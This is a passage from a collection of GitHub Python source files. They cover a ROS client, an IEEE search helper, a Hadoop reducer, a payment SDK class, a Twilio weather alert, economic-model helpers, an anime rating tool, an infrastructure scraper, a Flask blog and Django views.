\n print(\"after rotation and translation\")\n print(rotated)\n \n\n except rospy.ServiceException as e:\n print(\"Service call failed: %s\"%e)\n \nif __name__ == \"__main__\":\n if len(sys.argv) == 8:\n #vector inputs\n a, b, c= int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3])\n #angle inputs\n d, e, f = int(sys.argv[4]), int(sys.argv[5]), int(sys.argv[6])\n #translation d input\n g = int(sys.argv[7])\n else:\n sys.exit(1)\n rotate_translate_client(a, b, c, d, e, f, g)\n","repo_name":"melatdagnachew/RoboticsAssignment-1","sub_path":"Robotics-Assignment-1/src/ROSNode/src/arm_lib/scripts/vectorClient.py","file_name":"vectorClient.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24207652575","text":"#!/Users/slmlaptop/anaconda/bin/python\nimport webbrowser\nimport argparse\nstr1 = 'https://ieeexplore.ieee.org/search/searchresult.jsp?action=search&searchField=Search_All&matchBoolean=true&queryText='\n\nparser = argparse.ArgumentParser(description='Track papers on IEEE. Written by Liming Shi, Audio Analysis Lab, Aalborg University, Denmark. Contact: ls@create.aau.dk or limingshi12@foxmail.com')\nparser.add_argument('-j', nargs='*', default=[], help='The abbreviation of the journals and conferences, e.g., -j tsp spl')\nparser.add_argument('-c', action='store_true', help='Sorted by citations with sorting by newest as default.')\nparser.add_argument('-sc', nargs='*', default=[], help='Search content, e.g., -sc speech enhancement. 
The default is not specifying the content.')\nyear_range = ['2017', '2021']\nparser.add_argument('-tr', nargs=2, default=year_range, help='Time range of the searching results, e.g., -tr 2017 2021 (from 2017 to 2021). The default is 2017 to 2021.')\n\n\ndef get_options(args):\n str2 = ''\n str2 = str2 + '&highlight=true&returnType=SEARCH&matchPubs=true&'\n if args.c:\n str2 = str2 + 'sortType=paper-citations&'\n else:\n str2 = str2 + 'sortType=newest&'\n str2 = str2 + 'ranges=' + args.tr[0] + '_' + args.tr[1] + '_Year&'\n str2 = str2 + 'returnFacets=ALL&rowsPerPage=100&pageNumber=1'\n return str2\n\n\ndef AbbrevToFull(args):\n switcher = {'spl': 'IEEE Signal Processing Letters',\n 'tsp': 'IEEE Transactions on Signal Processing',\n 'taslp': 'IEEE/ACM Transactions on Audio, Speech, and Language Processing',\n 'pami': 'IEEE Transactions on Pattern Analysis and Machine Intelligence',\n 'jstsp': 'IEEE Journal of Selected Topics in Signal Processing',\n 'spm': 'IEEE Signal Processing Magazine',\n 'icassp': 'icassp',\n 'waspaa': 'waspaa'\n }\n if args.j:\n nI = len(args.j)\n keyword_str = switcher.get(args.j[0])\n keyword_str = keyword_str.replace(\" \", \"%20\")\n keyword_str = keyword_str.replace(\"/\", \"%2F\")\n str2 = ''\n str2 = str2 + '(%22Publication%20Title%22:' + keyword_str + ')'\n for i in range(1, nI):\n key = args.j[i]\n keyword_str = switcher.get(key)\n keyword_str = keyword_str.replace(\" \", \"%20\")\n keyword_str = keyword_str.replace(\"/\", \"%2F\")\n str2 = '(' + str2 + '%20OR%20%22Publication%20Title%22:' + keyword_str + ')'\n else:\n # pick selected journal/conference to search as default\n journal_list = ['taslp', 'spl', 'tsp', 'jstsp', 'spm', 'icassp', 'waspaa']\n keyword_str = switcher.get(journal_list[0])\n keyword_str = keyword_str.replace(\" \", \"%20\")\n keyword_str = keyword_str.replace(\"/\", \"%2F\")\n str2 = ''\n str2 = str2 + '(%22Publication%20Title%22:' + keyword_str + ')'\n for i in range(1, len(journal_list)):\n key = journal_list[i]\n keyword_str = switcher.get(key)\n keyword_str = keyword_str.replace(\" \", \"%20\")\n keyword_str = keyword_str.replace(\"/\", \"%2F\")\n str2 = '(' + str2 + '%20OR%20%22Publication%20Title%22:' + keyword_str + ')'\n if args.sc:\n keyword_str = ' '.join(args.sc)\n keyword_str = keyword_str.replace(\" \", \"%20\")\n str2 = '(' + str2 + '%20AND%20%22All%20Metadata%22:' + keyword_str + ')'\n return str2\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n # Abbreviation=args.Abbreviation\n str2 = AbbrevToFull(args)\n str3 = get_options(args)\n webbrowser.open(str1 + str2 + str3)\n","repo_name":"LimingShi/research-tools","sub_path":"PythonTools/track_journal.py","file_name":"track_journal.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"22176670378","text":"import sys\nimport string\n\nlast_cited = None\ncur_location = \"-\"\nciting_id_list = []\n\nfor line in sys.stdin:\n cited, citing, location = [x.strip() for x in line.split('\\t')]\n if not last_cited or last_cited == cited:\n last_cited = cited\n if location and location != \"-\":\n cur_location = location\n else:\n citing_id_list.append(citing)\n # print ('%s\\t%s\\t%s' % (cited,cited,location))\n elif cited != last_cited:\n for citing1 in citing_id_list:\n print ('%s,%s,%s' % (last_cited,citing1,cur_location))\n last_cited = cited\n cur_location = \"-\"\n citing_id_list = []\n if location and location != \"-\":\n cur_location = location\n else:\n 
citing_id_list.append(citing)\n\nfor citing1 in citing_id_list:\n print ('%s,%s,%s' % (last_cited,citing1,location))","repo_name":"vandana28/CSCI-5253-Datacenter-Scale-Computing-Assignments","sub_path":"lab3-hadoop-join-patent-vandana28-master/LAB3/reducer1.py","file_name":"reducer1.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"17750920891","text":"from ..utils.decorators import Private\n\nclass Withdraw:\n\n def __init__(self):\n pass\n\n\n @Private\n def create_withdraw(self, asset: str, bank: int, agency: int, account: int,\n type: str, amount: float, tfa: str) -> dict:\n body = {\n 'asset':asset,\n 'bank':bank,\n 'agency':agency,\n 'account':account,\n 'type': type,\n 'amount': amount,\n 'tfa': tfa\n }\n response = self.make_request('post', '/private/wallet/withdraw', body)\n return response\n \n\n @Private\n def list_withdraw(self, page=None, begin=None, end=None, search=None, asset=None, status=None) -> dict:\n body = {\n 'page': page,\n 'begin': begin,\n 'end': end,\n 'search': search,\n 'asset': asset,\n 'status': status\n }\n body = self.check_required_params(body)\n response = self.make_request('get', '/private/wallet/withdraw', body)\n return response\n \n\n @Private\n def get_withdraw_info(self, id_withdraw: int) -> dict:\n response = self.make_request('get', f'/private/withdraw/{id_withdraw}', {})\n return response\n \n\n @Private\n def download_withdraw_receipt(self, withdraw_id: int, name_file: str) -> dict:\n response = self.make_request('get', f'/private/wallet/withdraw/{withdraw_id}/receipt/{name_file}', {})\n return response\n \n\n \n ","repo_name":"kamoney/sdk_python","sub_path":"kamoney_sdk/endpoints_private/withdraw.py","file_name":"withdraw.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3534712139","text":"from twilio.rest import Client\nfrom decouple import config\nimport requests\n\nweather_api_key = config(\"weather_api_key\")\nMY_LAT = 40.760780\nMY_LONG = -111.891045\ntwilio_account_id = config(\"twilio_account_id\")\ntwilio_auth_token = config(\"twilio_auth_token\")\ntwilio_number = config(\"twilio_phone_number\")\n\n\n\nparameters = {\n \"lat\": MY_LAT,\n \"lon\": MY_LONG,\n \"appid\": weather_api_key,\n \"exclude\": \"current,minutely,daily\"\n}\n\nweather_response = requests.get(\"https://api.openweathermap.org/data/2.5/onecall\", params=parameters) \nweather_response.raise_for_status()\nweather_data = weather_response.json()\nhourly_weather = weather_data[\"hourly\"]\n\ngonna_rain = False\nfor hour in range(0, 12):\n if hourly_weather[hour][\"weather\"][0][\"id\"] < 700:\n gonna_rain = True\n\nif gonna_rain:\n print(\"It gonna rain\")\n \n\n\n\nclient = Client(twilio_account_id, twilio_auth_token)\n\nmessage = client.messages \\\n .create(\n body=\"Join Earth's mightiest heroes. 
Like Kevin Bacon.\",\n from_=twilio_number,\n to='+1 651 308 4855'\n )\nprint(message.status)\n\n","repo_name":"pfvatterott/Udemy-Python","sub_path":"Section35KeysAuthAndEnv/316TwilioSMS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15819619247","text":"import numba as nb\nimport numpy as np\nimport utils\nfrom GEModelTools import lag, lead\n\n\n@nb.njit\ndef chain_price_index(P, ssP, Y, P1, ssP1, Y1, P2, ssP2, Y2, T, sign=1.0):\n for t in range(T):\n if t==0:\n Y[t] = (ssP1 * Y1[t] + sign*(ssP2 * Y2[t]))/ssP\n else:\n Y[t] = (P1[t-1] * Y1[t] + sign*(P2[t-1] * Y2[t]))/P[t-1]\n P[t] = (P1[t] * Y1[t] + sign*(P2[t] * Y2[t]))/Y[t]\n\n\n@nb.njit\ndef CES_demand(c, PH, PF, P, eta, alpha, c_bar=0.0):\n cF = alpha * (PF/P)**(-eta) * (c - c_bar*PF/P) + c_bar \n cH = (1-alpha) * (PH/P)**(-eta) * (c - c_bar*PF/P)\n return cF, cH\n\n\n@nb.njit\ndef CES_demand_3_inputs(X, PH, PNT, PF,PX, eta, Theta_T, Theta_NT, Theta_M):\n XT2T = Theta_T * (PH/PX)**(-eta) * X \n XNT2T = Theta_NT * (PNT/PX)**(-eta) * X\n XM2T = Theta_M * (PF/PX)**(-eta) * X\n return XT2T, XNT2T, XM2T\n\n\n@nb.njit\ndef get_intermediates(XT, XNT, PXT, PXNT, PH, PNT, PF, Theta_T, Theta_NT, etaX): \n XT2T, XNT2T, XM2T = CES_demand_3_inputs(XT, PH, PNT, PF, PXT, etaX, Theta_T[0], Theta_T[1], Theta_T[2]) # intermediate demand in tradeable sector\n XNT2NT, XT2NT = CES_demand(XNT, PH, PNT, PXNT, etaX, Theta_NT[0]) # intermediate demand in non-tradeable sector\n return XT2NT, XNT2T, XNT2NT, XT2T, XM2T\n\n@nb.njit\ndef CES_demand_T(C, PT, PNT, P, etaT, alphaT, c_bar=0.0):\n CT = alphaT * (PT/P)**(-etaT) * (C - c_bar*PT/P) + c_bar \n CNT = (1-alphaT) * (PNT/P)**(-etaT) * (C - c_bar*PNT/P) \n return CT, CNT\n\n@nb.njit\ndef Armington(PH_s, PF_s, C_s, gamma, alpha):\n CH_s = alpha * (PH_s/PF_s)**(-gamma) * C_s\n return CH_s\n\n@nb.njit\ndef Price_index(PH, PF, eta, alpha):\n if utils.isclose(eta,1.0):\n P = PF**alpha * PH**(1-alpha)\n else:\n P = (alpha*PF**(1-eta) + (1-alpha)*PH**(1-eta))**(1/(1-eta))\n return P\n\n@nb.njit\ndef Price_index_T(PH, PNT, PF, etaX, X_share_T):\n if utils.isclose(etaX,1.0):\n PXT = PH**X_share_T[0] * PNT**X_share_T[1] * PF**X_share_T[2]\n else:\n PXT = (X_share_T[0]*PH**(1-etaX) + X_share_T[1]*PNT**(1-etaX) + X_share_T[2]*PF**(1-etaX))**(1/(1-etaX))\n return PXT\n\n@nb.njit\ndef Price_index_NT(PH, PNT, etaX, X_share_NT):\n if utils.isclose(etaX,1.0):\n PXNT = PNT**X_share_NT[0] * PH**X_share_NT[1] \n else:\n PXNT = (X_share_NT[0]*PNT**(1-etaX) + X_share_NT[1]*PH**(1-etaX))**(1/(1-etaX))\n return PXNT\n\n@nb.njit\ndef sol_Price_index_rel(pF, eta, alpha):\n if utils.isclose(eta,1.0):\n pH = (1.0/(pF**alpha))**(1/(1-alpha))\n else:\n pH = ((1.0-alpha*pF**(1-eta))/(1-alpha))**(1/(1-eta))\n return pH\n\n\n@nb.njit\ndef sol_Price_index2(pH, pF, eta, alpha):\n if utils.isclose(eta,1.0):\n pF = (1.0/(pH**(1-alpha)))**(1/alpha)\n else:\n pF = ((1.0-(1-alpha)*pH**(1-eta))/alpha)**(1/(1-eta))\n return pF\n\n@nb.njit\ndef Inf(P, ssval):\n P_lag = lag(ssval,P) \n pi = P/P_lag - 1\n pi_p = lead(pi,0)\n return pi, pi_p\n\n@nb.njit\ndef P_from_inf(P, inf, T, ssP):\n for t in range(T):\n if t == 0:\n P[t] = ssP*(1+inf[t]) \n else:\n P[t] = P[t-1]*(1+inf[t]) \n\n\n@nb.njit\ndef Get_HH_A(A, C, I, ra, T, ss):\n for t in range(T): \n if t==0:\n A[t] = ss.A * (1+ra[t]) + I[t] - C[t] \n else:\n A[t] = A[t-1] * (1+ra[t]) + I[t] - C[t] \n \n\n@nb.njit \ndef sol_backwards_lin(var, ssvar, a, b, T):\n for tt in 
range(T):\n t = T-1-tt\n if t == T-1:\n var[t] = ssvar\n else:\n var[t] = a[t] + b[t] * var[t+1] \n \ndef sol_backwards(var, ssvar, par, f, *args):\n for tt in range(par.T):\n t = par.T-1-tt\n if t == par.T-1:\n var[t] = ssvar\n else:\n var[t] = f(t, var[t+1], *args) \n\ndef sol_forwards(var, ssvar, par, f, *args):\n for t in range(par.T):\n if t == 0:\n var[t] = f(t, ssvar, *args)\n else:\n var[t] = f(t, var[t-1], *args) ","repo_name":"nWaldstrom/MultiSecSOEHANK","sub_path":"Model/Main/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73108483971","text":"import cv2\nimport os\nimport numpy as np\nfrom tensorflow import keras\n\ndef load_test_images(folder_path):\n images = []\n for filename in sorted(os.listdir(folder_path)):\n if filename.endswith(\".jpg\"):\n img_path = os.path.join(folder_path, filename)\n img = cv2.imread(img_path)\n img = cv2.resize(img, (256, 144)) # Масштабируем изображение\n images.append(img)\n return np.array(images)\n\ndef convert_video_to_images(video_path, output_folder):\n # Проверяем, существует ли папка для сохранения изображений, и создаем ее, если она не существует\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n # Открываем видеофайл\n cap = cv2.VideoCapture(video_path)\n \n frame_count = 0\n\n # Перебираем кадры видео\n while True:\n ret, frame = cap.read()\n \n # Если кадры закончились или достигнут лимит, завершаем цикл\n if not ret:\n break\n\n # Сохраняем кадр как изображение .jpg\n img_filename = os.path.join(output_folder, f\"frame_{frame_count:04d}.jpg\")\n cv2.imwrite(img_filename, frame)\n frame_count += 1\n\n # Закрываем видеофайл\n cap.release()\n\n# Папка с тестовыми изображениями\ntest_image_folder = 'frames_bad'\n\n# Конвертируем видео в картинки\nconvert_video_to_images('0_144.mp4', test_image_folder)\n\n# Загрузка и предобработка тестовых изображений\ntest_images = load_test_images(test_image_folder)\n\n# Загрузка обученной модели\nmodel = keras.models.load_model('super_resolution_model_20230924092656.h5')\n\noutput_folder = 'super_res_test_results'\n\nif not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n# Сделаем предсказания и сохранение улучшенных изображений одновременно\nfor i, test_image in enumerate(test_images):\n # Предсказываем улучшенное изображение\n super_res_image = model.predict(np.expand_dims(test_image / 255.0, axis=0))[0]\n\n # Сохраняем улучшенное изображение\n img_filename = os.path.join(output_folder, f\"super_res_image_{i:04d}.jpg\")\n super_res_image = (super_res_image * 255).astype(np.uint8)\n cv2.imwrite(img_filename, super_res_image)\n\n\nimages = [img for img in os.listdir(output_folder) if img.endswith(\".jpg\")]\n\n# Получить размер первого изображения (предполагается, что все изображения имеют одинаковый размер)\nframe = cv2.imread(os.path.join(output_folder, images[0]))\nheight, width, layers = frame.shape\n\nvideo = cv2.VideoWriter('output_video.mp4', cv2.VideoWriter_fourcc(*'mp4v'), 30, (width,height))\n\nfor image in images:\n video.write(cv2.imread(os.path.join(output_folder, image)))\n\ncv2.destroyAllWindows()\nvideo.release()","repo_name":"DanChass/task","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"44228488668","text":"import random\nimport xml.etree.ElementTree as ET\nimport 
sqlite3\n\n\ndef db_insert(c, name, elo, flag):\n print(\"Inserting: \" + name, elo, flag)\n c.execute(\"INSERT INTO ratings VALUES (?, ?, ?)\", (name, elo, flag))\n\n\ndef db_update(c, name, elo, flag=None):\n if flag:\n c.execute(\"UPDATE ratings SET flag=? WHERE name=?\", (flag, name))\n else:\n c.execute(\"UPDATE ratings SET elo=? WHERE name=?\", (elo, name))\n\n\ndef db_load(c, flag=0):\n animelist = {}\n try:\n for row in c.execute(\"SELECT * FROM ratings WHERE flag=?\", (flag,)):\n animelist[row[0]] = row[1]\n except Exception as e:\n print(e)\n return animelist\n\n\ndef elo_exp(a, b):\n exp_a = 1 / (1 + (10 ** ((b - a) / 400)))\n exp_b = 1 / (1 + (10 ** ((a - b) / 400)))\n return exp_a, exp_b\n\n\ndef update_elo(a, b, winner):\n k = 32\n exp_a, exp_b = elo_exp(a, b)\n if winner == 0:\n a_upd = a + k * (1 - exp_a)\n b_upd = b + k * (0 - exp_b)\n else:\n a_upd = a + k * (0 - exp_a)\n b_upd = b + k * (1 - exp_b)\n\n return a_upd, b_upd\n\n\ndef update_animelist(c, animelist):\n tree = ET.parse(\"animelist.xml\")\n root = tree.getroot()\n completed = []\n db_dict = db_load(c)\n db_flag = db_load(c, flag=1)\n for anime in root.findall(\"anime\"):\n name = anime.find(\"series_title\").text\n status = anime.find(\"my_status\").text\n if status == \"Completed\":\n completed.append(name)\n for anime in completed:\n if anime not in db_dict.keys() and anime not in db_flag.keys():\n db_insert(c, anime, 1000, 0)\n\n\ndef main():\n conn = sqlite3.connect(\"animeratings.db\")\n c = conn.cursor()\n c.execute(\"CREATE TABLE IF NOT EXISTS ratings (name TEXT UNIQUE, elo REAL, flag INT)\")\n ratings = db_load(c)\n update_animelist(c, ratings)\n conn.commit()\n ratings = db_load(c)\n\n while True:\n items = random.sample(ratings.keys(), 2)\n print(\"1: {}\\n2: {}\\n3: Skip 4: Flag 5: Print ratings 0: Stop\".format(items[0], items[1]))\n try:\n x = int(input(\">\"))\n except Exception as e:\n print(e)\n x = 99\n if x == 0:\n for anime, elo in ratings.items():\n db_update(c, anime, elo)\n conn.commit()\n break\n elif x == 1 or x == 2:\n print(\"Selection: {}\\n\".format(items[x - 1]))\n ratings[items[0]], ratings[items[1]] = update_elo(ratings[items[0]], ratings[items[1]], x - 1)\n elif x == 4:\n print(\"1: flag 1 2: Flag 2 3: Cancel\")\n try:\n choice = int(input(\">\"))\n except Exception as e:\n print(e)\n choice = 99\n if choice == 1 or choice == 2:\n db_update(c, items[choice-1], ratings[items[choice-1]], flag=1)\n else:\n pass\n elif x == 5:\n s = dict(sorted(ratings.items(), key=lambda x: x[1]))\n for k, v in s.items():\n print(k, v)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Sibula/AnimeRater","sub_path":"animerate.py","file_name":"animerate.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"33385192910","text":"\nimport os\nimport importlib\nimport time\n\nfrom infra_scraper import constructors\nfrom infra_scraper import exceptions\nfrom infra_scraper.utils import load_yaml_json_file, setup_logger\n\nlogger = setup_logger(__name__)\n\nconfig_backend = os.environ.get('INFRA_SCRAPER_CONFIG_BACKEND',\n 'localfs')\nconfig_file = os.environ.get('INFRA_SCRAPER_CONFIG_PATH',\n '/etc/infra-scraper/config.yaml')\n\n\ndef _get_module(module_key):\n class_mapping = constructors.get_constructor_mapping()\n if module_key not in class_mapping:\n raise exceptions.InfraScraperException(\n \"Service {module_key} is unkown. 
Please pass in a client\"\n \" constructor or submit a patch to infra scraper\".format(\n module_key=module_key))\n mod_name, ctr_name = class_mapping[module_key].rsplit('.', 1)\n lib_name = mod_name.split('.')[0]\n try:\n mod = importlib.import_module(mod_name)\n except ImportError:\n raise exceptions.InfraScraperException(\n \"Client for '{module_key}' was requested, but\"\n \" {mod_name} was unable to be imported. Either import\"\n \" the module yourself and pass the constructor in as an argument,\"\n \" or perhaps you do not have module {lib_name} installed.\".format(\n module_key=module_key,\n mod_name=mod_name,\n lib_name=lib_name))\n try:\n ctr = getattr(mod, ctr_name)\n except AttributeError:\n raise exceptions.InfraScraperException(\n \"Client for '{module_key}' was requested, but although\"\n \" {mod_name} imported fine, the constructor at {fullname}\"\n \" as not found.\".format(\n module_key=module_key,\n mod_name=mod_name,\n fullname=class_mapping[module_key]))\n return ctr\n\n\nclass InfraScraper(object):\n def __init__(self):\n self.config = self.get_global_config()\n storage_class = self.config.get('storage', {'backend': 'localfs'})\n self.storage = self._get_module('storage',\n storage_class['backend'],\n storage_class)\n\n def _get_module(self, module_file, module_key, module_init={}):\n module_class = _get_module(\"{}-{}\".format(\n module_file, module_key))\n return module_class(**module_init)\n\n def get_global_config(self):\n return load_yaml_json_file(config_file)\n\n def get_config(self, name):\n config = self.config['endpoints'][name]\n config['name'] = name\n return config\n\n def status(self):\n config = self.config\n for endpoint_name, endpoint in self.config['endpoints'].items():\n endpoint.pop('config')\n endpoint['status'] = self.get_endpoint_status(endpoint_name)\n return config\n\n def get_endpoint_status(self, name):\n try:\n data = self.get_cached_data(name, 'count')\n except Exception as e:\n logger.error('Cannot get last status for {}, with error {}.'.format(name, e))\n data = None\n return data\n\n def scrape_all_data_forever(self, interval):\n config = self.get_global_config()\n while True:\n for endpoint_name, endpoint in config['endpoints'].items():\n self.scrape_data(endpoint_name)\n time.sleep(config.get('scrape_interval', 60))\n\n def scrape_all_data(self):\n config = self.get_global_config()\n for endpoint_name, endpoint in config['endpoints'].items():\n if config.get('debug', False):\n return self.scrape_data(endpoint_name)\n try:\n self.scrape_data(endpoint_name)\n except Exception as e:\n logger.error('Scraping endpoint {} failed with error: {}'.format(endpoint_name, e))\n\n def scrape_data_forever(self, name, interval):\n config = self.get_global_config()\n sleep_interval = config.get('scrape_interval', interval)\n while True:\n self.scrape_data(name)\n logger.info('Sleeping for {} seconds.'.format(sleep_interval))\n time.sleep(sleep_interval)\n\n def scrape_data(self, name):\n config = self.get_config(name)\n self.input = self._get_module('input', config['kind'], config)\n self.out_count = self._get_module('output', 'count')\n self.out_vis = self._get_module('output', 'vis')\n self.out_vis_hier = self._get_module('output', 'vis-hier')\n logger.info('Scraping of {} started.'.format(name))\n self.input.scrape_all_resources()\n data = self.input.to_dict()\n self.storage.save_data(name, data.copy())\n self.storage.save_output_data(name, 'count',\n self.out_count.get_data('raw', data.copy()))\n self.storage.save_output_data(name, 'vis',\n 
self.out_vis.get_data('raw', data.copy()))\n self.storage.save_output_data(name, 'vis-hier',\n self.out_vis_hier.get_data('raw', data.copy()))\n logger.info('Scraping of {} completed.'.format(name))\n\n def get_cached_data(self, name, kind):\n storage = self._get_module('storage', 'file')\n data = storage.load_output_data(name, kind)\n return data\n\n def get_data(self, name, kind, format='raw'):\n self.output = self._get_module('output', kind)\n data = self.storage.load_data(name)\n return self.output.get_data(format, data)\n","repo_name":"cznewt/infra-scraper","sub_path":"infra_scraper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"43"} +{"seq_id":"17999662588","text":"from datetime import datetime # datetime for posts\nfrom flask import Flask, render_template, request, redirect # stuff from flask\nfrom flask_sqlalchemy import SQLAlchemy # database\n\napp = Flask(__name__) # set up our server with name of our app\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///posts.db' # configure database\ndb = SQLAlchemy(app) # enable our database for our app\n\n\nclass BlogPost(db.Model): # model in our database\n id = db.Column(db.Integer, primary_key=True) # id of post\n title = db.Column(db.String(100), nullable=False) # title of post\n content = db.Column(db.Text, nullable=False) # content of post\n author = db.Column(db.String(20), nullable=False, default='Anonym') # author of post, anonym by default\n date_posted = db.Column(db.DateTime, nullable=False, default=datetime.now()) # date of post\n is_edited = db.Column(db.Boolean, default=False) # check if the post was edited\n time_edited = db.Column(db.DateTime, default=None) # if post was not edited, change time equals to post time\n\n def __repr__(self):\n return 'Post number ' + str(self.id) # comes in server every time we create new Post object\n\n\nall_posts = [\n {\n 'title': 'Post 1',\n 'content': 'Why nobody loves me? 
:(',\n 'author': 'Tigran'\n },\n {\n 'title': 'Post 2',\n 'content': 'I love you bro ;)'\n }\n] # hard coded not real db, which I left only for example\n\n\n@app.route('/') # about page\ndef index():\n return render_template('index.html') # load about page\n\n@app.route('/projects')\ndef projects():\n return render_template('projects.html')\n\n@app.route('/posts', methods=['GET', 'POST']) # posts page\ndef posts():\n if request.method == 'POST': # creating new post, only if request method is post\n post_title = request.form['title']\n post_author = request.form['author']\n post_content = request.form['content']\n new_post = BlogPost(title=post_title, content=post_content, author=post_author, date_posted=datetime.now())\n db.session.add(new_post) # adding new post to database for current session\n db.session.commit() # commit session changes for it to stay on database\n return redirect('/posts') # redirect to posts page to see all posts\n else:\n all_posts = BlogPost.query.order_by(BlogPost.date_posted).all()[::-1] # define all pages, with newest first\n return render_template('posts.html', posts=all_posts) # load posts.html, and give it our all posts to load\n\n\n@app.route('/posts/delete/') # post deleting page\ndef delete(id):\n post = BlogPost.query.get_or_404(id) # getting our post, or if id is invalid, get 404\n db.session.delete(post) # delete post from db in our session\n db.session.commit() # commit session changes\n return redirect('/posts') # redirect then to posts page\n\n\n@app.route('/posts/edit/', methods=['GET', 'POST']) # post edit page\ndef edit(id):\n post = BlogPost.query.get_or_404(id) # getting our post, or if id is invalid, get 404\n if request.method == 'POST': # checking request method\n post.title = request.form['title'] # change title of post to title that came from page\n post.author = request.form['author'] # change author of post to author that came from page\n post.content = request.form['content'] # change content of post to content that came from page\n post.is_edited = True # we mark that the post was changed, to make it easier to display\n post.time_edited = datetime.now() # we set time at it was changed\n db.session.commit() # commit session changes\n return redirect('/posts') # redirect to posts page\n else:\n return render_template('edit.html', post=post) # return post after changes\n\nif __name__ == \"__main__\": # run our file in debug mode only if we are calling it there\n app.run(debug=True)\n","repo_name":"TikoA/Flask-Portfolio","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13456500072","text":"\"\"\"tds URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path, include\nfrom url_manager.views import signup, LinkCreateView, LinkDetailView, HomeView, TemplateView,\\\n LandingPageCreateView, LinksLandingPagesCreateView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('accounts/', include('django.contrib.auth.urls')),\n re_path(r'^signup/$', signup, name='signup'),\n path('', HomeView.as_view(template_name='home.html'), name='home'),\n path('landing1/', TemplateView.as_view(template_name='landing1.html'), name='landing_1'),\n path('landing2/', TemplateView.as_view(template_name='landing2.html'), name='landing_2'),\n path('landing3/', TemplateView.as_view(template_name='landing3.html'), name='landing_3'),\n path('create-link/', LinkCreateView.as_view(), name='create-link'),\n path('create-links-landing-pages/', LinksLandingPagesCreateView.as_view(), name='create-links-landing-pages'),\n path('create-landing-page/', LandingPageCreateView.as_view(), name='create-landing-page'),\n path('links//', LinkDetailView.as_view(), name='link-detail'),\n path('landing-pages/', include('url_manager.urls')),\n\n]\n","repo_name":"deniskolosov/traffic-redirector","sub_path":"tds/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74277343168","text":"# Crie um programa que leia um número inteiro e mostre se ele é PAR ou ÍMPAR.\n\nnum = int(input('Digite um número inteiro qualquer: '))\nx = num%2\nif x==0:\n print('O número {} é PAR!'.format(num))\nelse:\n print('O número {} é ÍMPAR!'.format(num))\n\n# Obs: O resto da divisão (%) de qualquer número par é 0 e de qualquer número ímpar é 1!\n","repo_name":"simonecrepaldi/Desafios-de-Python-Curso-em-Video","sub_path":"exercícios/ex030.py","file_name":"ex030.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"9252129508","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom social_django.models import UserSocialAuth\n\n\n# Create your views here.\ndef authView(request):\n \n return render(request, 'userAuth.html')\n\ndef profileView(request):\n \n def microsoftProfile(user_token):\n \n import requests\n import base64\n graph_api_endpoint = \"https://graph.microsoft.com/v1.0/me/photo/$value\"\n headers = {\n \"Authorization\": \"Bearer \" + user_token\n }\n response = requests.get(graph_api_endpoint, headers=headers)\n\n # Check the response status code\n if response.status_code == 200:\n # Request successful\n profile_picture_data = response.content\n # Convert the profile picture data to base64\n profile_picture_base64 = base64.b64encode(profile_picture_data).decode(\"utf-8\")\n # Access the profile picture base64 encoded data as needed\n return profile_picture_base64\n else:\n # Request failed\n print(\"Failed to retrieve profile picture. 
